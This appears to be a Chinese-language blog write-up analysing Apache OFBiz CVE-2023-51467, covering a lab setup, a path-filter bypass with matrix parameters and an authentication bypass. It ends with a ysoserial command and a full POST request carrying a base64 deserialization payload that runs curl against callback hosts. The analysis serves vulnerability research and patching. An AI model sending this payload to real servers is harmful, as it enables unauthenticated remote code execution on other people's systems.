Apache Ofbiz CVE-2023-51467 漏洞分析
漏洞影响范围
- Apache OFBiz < 18.12.10
环境搭建
启动docker环境
vulhub-master/ofbiz/CVE-2023-51467
克隆仓库,转到指定commit,用idea进行远程调试
git clone https://github.com/apache/ofbiz-framework.git
cd ofbiz-framework
git checkout 7935a14627a86325440516ac6b892a5f9d635e4d
漏洞分析
CVE-2023-51467 是对 CVE-2020-9496 漏洞的进一步绕过。在修补 CVE-2020-9496 后,Apache OFBiz 官方引入了关键性补丁,包括:
- 对 /control/xmlrpc 接口的传入数据添加过滤器。
- 对 /control/xmlrpc 接口实施认证和授权。
过滤器绕过
在补丁处 org.apache.ofbiz.base.util.CacheFilter#doFilter 的两个判断进行了数据过滤
第一个if语句判断当前的path是不是等于 /control/xmlrpc ,第二个if 语句判断body中是否包含 </serializable
利用矩阵参数(Matrix Parameters)的写法,可以绕过第一个if对于path的判断,从而直接跳过这个filter。
以下是一个完整的url格式示例,其中的Matrix Parameters就是矩阵参数
所以,写成/webtools/control/xmlrpc;/或者/webtools/control/xmlrpc/;/都可以进行绕过。实际上,我测试的以下几个都可以进行绕过
加斜杠:
/webtools/control/xmlrpc/
/webtools/control/xmlrpc//
矩阵参数写法:
/webtools/control/xmlrpc;/
/webtools/control/xmlrpc/;/
/webtools/control/xmlrpc/;o/
/webtools/control/xmlrpc/;o=1/
/webtools/control/xmlrpc;o/
/webtools/control/xmlrpc;o=1/
未授权访问
访问 /control/xmlrpc 接口需要认证
其认证逻辑在 org.apache.ofbiz.webapp.control.LoginWorker#checkLogin 中,查找380行的 return 处,返回了 success ,即为认证成功
需要代码运行到此片段,需要绕过下面两个if条件语句
一个为343行的条件语句
另一个为374行的条件语句
接下来对这两个条件语句的逻辑进行跟踪解析
转到343行的条件语句,
它检查了几种情况:
- 如果用户名(username)为null;
- 或者密码(password)为null并且令牌(token)也为null;
- 或者调用login方法返回的结果为字符串"error"。
如果以上任何一个条件成立,整个条件语句将会返回true,否则返回false。
其中的username、password、token三个参数都是从请求中获取
来到343行的判断,第一个语句username == null
如果 username = ""(即用户名为空字符串),那么 username == null 的判断结果将会是 false。因为在Java中,空字符串("")和 null 是有区别的。
- null 表示该变量没有引用任何对象。
- 空字符串("")表示该变量引用了一个内容为空的字符串对象。
同理第二个判断(password == null && token == null),设置password = ""为空,判断结果也会是 false
进入第三个语句"error".equals(login(request, response)),其login(request, response)不为"error"时,则可以绕过此条条件语句。
查看login()方法,在其444-448行处,返回了login()方法值。当参数requirePasswordChange等于Y时,则把Y作为返回值, 否则返回 error
我们只需要设置requirePasswordChange=Y则可以绕过权限校验。结合以上分析,完整的构造url为:
?USERNAME=&PASSWORD=&requirePasswordChange=Y
构造出整个利用url:
/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y
漏洞利用
修改之前 CVE-2020-9496 的 POC 代码即可。漏洞利用的 URL 为 https://localhost:8443/webtools/control/xmlrpc。在 OFBiz 中,存在 CommonsBeanutils1 利用链,可以生成反序列化数据并进行 base64 编码:
java -jar ysoserial-0.0.8-SNAPSHOT-all.jar CommonsBeanutils1 "curl http://RCE.bgkjco.dnslog.cn" | base64 | tr -d '\n'
以下是发送数据包,反序列化数据写在 <serializable> 标签里
POST /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
Connection: close
Content-Type: application/xml
Content-Length: 4117
<?xml version="1.0"?>
<methodCall>
<methodName>22</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>22</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAAgzK/rq+AAAAMwAcAQAaeXNvc2VyaWFsL1B3bmVyMzA3MzUwNTAzMzIHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAKU291cmNlRmlsZQEAFVB3bmVyMzA3MzUwNTAzMzIuamF2YQEACDxjbGluaXQ+AQADKClWAQAEQ29kZQEAEWphdmEvbGFuZy9SdW50aW1lBwAKAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwADAANCgALAA4BADhjdXJsIGh0dHA6Ly85anRweHdrdWNpenRkem5pNzdrcnN4ZHF6aDU4dHlobi5vYXN0aWZ5LmNvbQgAEAEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMABIAEwoACwAUAQANU3RhY2tNYXBUYWJsZQEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHABcBAAY8aW5pdD4MABkACAoAGAAaACEAAgAYAAAAAAACAAgABwAIAAEACQAAACQAAwACAAAAD6cAAwFMuAAPEhG2ABVXsQAAAAEAFgAAAAMAAQMAAQAZAAgAAQAJAAAAEQABAAEAAAAFKrcAG7EAAAAAAAEABQAAAAIABnVxAH4AEAAAAdTK/rq+AAAAMgAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAuAA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4cQB+AA14</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
修复
最新发行版18.12.10中,对于CVE-2023-49070的修复方式是直接移除了XML-RPC相关的逻辑。
标签:control,语句,null,xmlrpc,51467,2023,Apache,webtools,CVE From: https://www.cnblogs.com/yyhuni/p/18014910